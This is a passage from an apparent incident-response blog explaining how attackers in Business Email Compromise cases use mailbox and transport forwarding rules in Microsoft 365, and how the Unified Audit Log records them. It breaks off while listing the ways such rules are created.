In this blog, we present various scenarios in which threat actors can utilise email forwarding rules and the associated evidence in the UAL. Additionally, we have created a comprehensive mind map that summarises the contents of the blog for use in incident detection and response investigations.
Email forwarding rules
In this blog we will discuss a threat actor technique that we will summarise as ‘email forwarding rules’. Often in Business Email Compromise (BEC) cases a threat actor accesses a victim email environment and they configure an email forwarding rule. There are several motivations for the threat actor to do this, first as a persistence mechanism (T1137.005) and second as a method to collect emails (T1114.003).
Mailbox vs Transport rules
There are two types of rules:
- Mailbox rule
- Transport rule
A mailbox or inbox rule is configured on a per mailbox base and can be configured by the Owner/Admin/Delegate of a mailbox.
A transport or mail flow rule is configured on the entire email flow of an organisation. Can only be configured by users with administrative roles/permissions. More details on Transport rules in the official documentation.
Unified Audit Log
The UAL is a crucial log for incident response in Microsoft 365 tenants. It captures both user and admin initiated actions and is enabled by default. While we won’t delve into the specifics of acquiring or processing this data in this blog post, we’ve included links to relevant resources in the Resources section for those who need more information.
Threat actors have several techniques at their disposal when creating an email forwarding rule. They can configure a mailbox rule through the web GUI (https://outlook.office.com/), through an email client like Outlook, or through PowerShell or an API. The following scenarios outline the possible methods for creating a mailbox rule:
- New mailbox rule, a new email rule is created on a mailbox;
- An existing mailbox rule is…